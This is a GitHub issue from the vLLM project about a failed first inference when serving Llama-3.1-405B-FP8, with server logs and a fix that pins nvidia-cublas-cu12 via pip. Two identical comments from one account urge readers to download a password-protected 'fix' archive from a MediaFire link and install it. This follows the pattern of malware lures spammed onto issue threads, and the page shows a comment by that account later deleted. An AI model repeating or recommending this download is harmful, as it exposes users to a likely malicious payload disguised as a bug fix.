Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Bug]: After VLLM successfully starts the service, a prompt will appear during the first inference and the inference cannot proceed normally #7893

Closed
1 task done
fu1996 opened this issue Aug 27, 2024 · 2 comments
Labels
bug Something isn't working

Comments

@fu1996
Copy link

fu1996 commented Aug 27, 2024

Your current environment

The output of `python3 -m vllm.entrypoints.openai.api_server --model /data0/models/405B-instruct-FP8 --swap-space 16 --tensor-parallel-size 8 --served-model-name llama-3.1-405B --host 0.0.0.0 --port 8081 --max-num-seqs 256 --enforce-eager`
INFO 08-27 10:47:25 logger.py:36] Received request cmpl-cbb8382b602e4d39b88f0c5f955da4f1-0: prompt: '你是谁?', params: SamplingParams(n=1, best_of=1, presence_penalty=0.0, frequency_penalty=0.0, repetition_penalty=1.0, temperature=0.0, top_p=1.0, top_k=-1, min_p=0.0, seed=None, use_beam_search=False, length_penalty=1.0, early_stopping=False, stop=[], stop_token_ids=[], include_stop_str_in_output=False, ignore_eos=False, max_tokens=100, min_tokens=0, logprobs=None, prompt_logprobs=None, skip_special_tokens=True, spaces_between_special_tokens=True, truncate_prompt_tokens=None), prompt_token_ids: [128000, 57668, 21043, 112471, 11571], lora_request: None, prompt_adapter_request: None.
INFO 08-27 10:47:25 async_llm_engine.py:174] Added request cmpl-cbb8382b602e4d39b88f0c5f955da4f1-0.
/root/miniconda3/envs/vllm-0.5.4/lib/python3.11/multiprocessing/resource_tracker.py:254: UserWarning: resource_tracker: There appear to be 1 leaked shared_memory objects to clean up at shutdown
  warnings.warn('resource_tracker: There appear to be %d '

🐛 Describe the bug

No code. Just starting the service

nvidia-smi result is

NVIDIA-SMI 535.161.07 Driver Version: 535.161.07 CUDA Version: 12.2

uname -a result is
Linux VM-0-16-centos 5.4.119-19.0009.28 #1 SMP Thu May 18 10:37:10 CST 2023 x86_64 x86_64 x86_64 GNU/Linux

linux version is H20

Before submitting a new issue...

  • Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the documentation page, which can answer lots of frequently asked questions.
@fu1996 fu1996 added the bug Something isn't working label Aug 27, 2024
@amir1387aht
Copy link

to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

1 similar comment
@amir1387aht
Copy link

to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

@fu1996
Copy link
Author

fu1996 commented Aug 27, 2024

Solved, the underlying Nvidia-Cublabs-CU12 dependency is incorrect.
pip3 install nvidia-cublas-cu12==12.3.4.1 -i https://pypi.tuna.tsinghua.edu.cn/simple

@fu1996 fu1996 closed this as completed Aug 27, 2024
@vllm-project vllm-project deleted a comment from amir1387aht Aug 27, 2024
@github-staff github-staff deleted a comment from fu1996 Aug 27, 2024
@github-staff github-staff deleted a comment from jeejeelee Aug 27, 2024
@allenz92
Copy link

Solved, the underlying Nvidia-Cublabs-CU12 dependency is incorrect. pip3 install nvidia-cublas-cu12==12.3.4.1 -i https://pypi.tuna.tsinghua.edu.cn/simple

Hi Fu, how did you find out about the version mismatch?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

No branches or pull requests

3 participants